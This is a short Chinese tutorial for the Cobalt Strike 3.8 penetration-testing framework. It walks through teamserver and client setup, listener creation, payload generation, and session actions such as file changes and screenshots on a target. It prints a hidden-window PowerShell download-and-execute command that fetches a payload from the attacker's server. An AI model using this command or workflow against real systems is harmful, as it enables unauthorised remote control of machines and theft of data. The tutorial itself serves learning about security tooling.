前言

Cobalt Strike是一款Java写的Metasploit图形界面的渗透测试软件,Cobalt Strike集成了端口转发、扫描多模式端口监听Windows exe木马,生成Windows dll(动态链接库)木马,生成java木马,生成office宏病毒,生成木马捆绑钓鱼攻击,包括站点克隆目标信息获取java执行浏览器自动攻击等等。以下是基于Cobalt Strike 3.8版本的简单入门教程。

Cobalt Strike分为服务端和客户端两个部分从而实现分布式操作,协同作战。工具有linux和windows版本。

0x01 创建服务端

1.打开解压后的文件夹,如下图所示:
cos_1.png

2.找到teamserver并运行,格式为teamserver [ip] [password],ip为服务端ip,password为客户端连接密码,如下图所示:
cos_2.png

0x02 创建客户端

1.运行cobaltstrike,在host字段中填入服务端ip,user字段中随意输入,password是服务端连接密码,port是开启的端口,默认是50050,如下图所示:
cos_3.png

2.点击连接,如下图所示:
cos_4.png

至此服务端与客户端的连接已经完成,可以开始使用Cobalt Strike的各项功能,在Event log中可以看到各个客户端的操作。

0x03 生成木马

1.创建监听器:首先点击右上角耳机图标,选择add。然后输入创建监听器的名称(随意输入),指定监听的端口(随意指定),Host为服务端ip,payload可以自定义类型。
如下图所示:
cos_5.png

2.生成攻击载荷,在菜单栏attack选项中可以选择各个类型的攻击载荷,并与监听器绑定。这里主要介绍powershell类型,和windows下的木马。

(1)powershell生成:

1) 选择attack菜单中的如下选项:

cos_6.png

  
2)Type字段中选择powershell,点击launch。

cos_7.png

3)生成的poweshell为(powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.91.128:80/a'))")可以直接在目标机中的powershell中使用,使用后会在攻击客户端上生成session,如下图所示:

cos_8.png

(2)windows木马生成

 1)选择attack菜单中的如下选项:

cos_9.png

 2)选择需要的类型后,点击generate,生成exe文件 

cos_10.png

  
 3)当在目标机上运行这个文件时,将会在攻击客户端上生成session,如下图所示:

cos_11.png

0x04 session的使用

1.文件的基本操作,可以对目标机上的文件进行增加,修改,删除。
1) 右键需要操作的session,选择如下操作:
cos_12.png

2)等待一段时间之后会返回操作框,如下图所示:
cos_13.png

2.截取当前屏幕显示
1)选择相关操作:
cos_14.png

2)等待一段时间后得到回显,如下图所示:
cos_15.png

3.其它操作
除了文件基本操作和截屏之外还有键盘记录,进程注入等功能这里就不一一介绍了。

总结

这里仅仅只是Cobalt Strike的一些基本入门操作,适用于了解这款工具。当然它还有许多进阶的用法,例如与MSF联用等。它的优势在于可以分布式协同攻击,只要在同一服务端下的客户端可以共享的所有seession。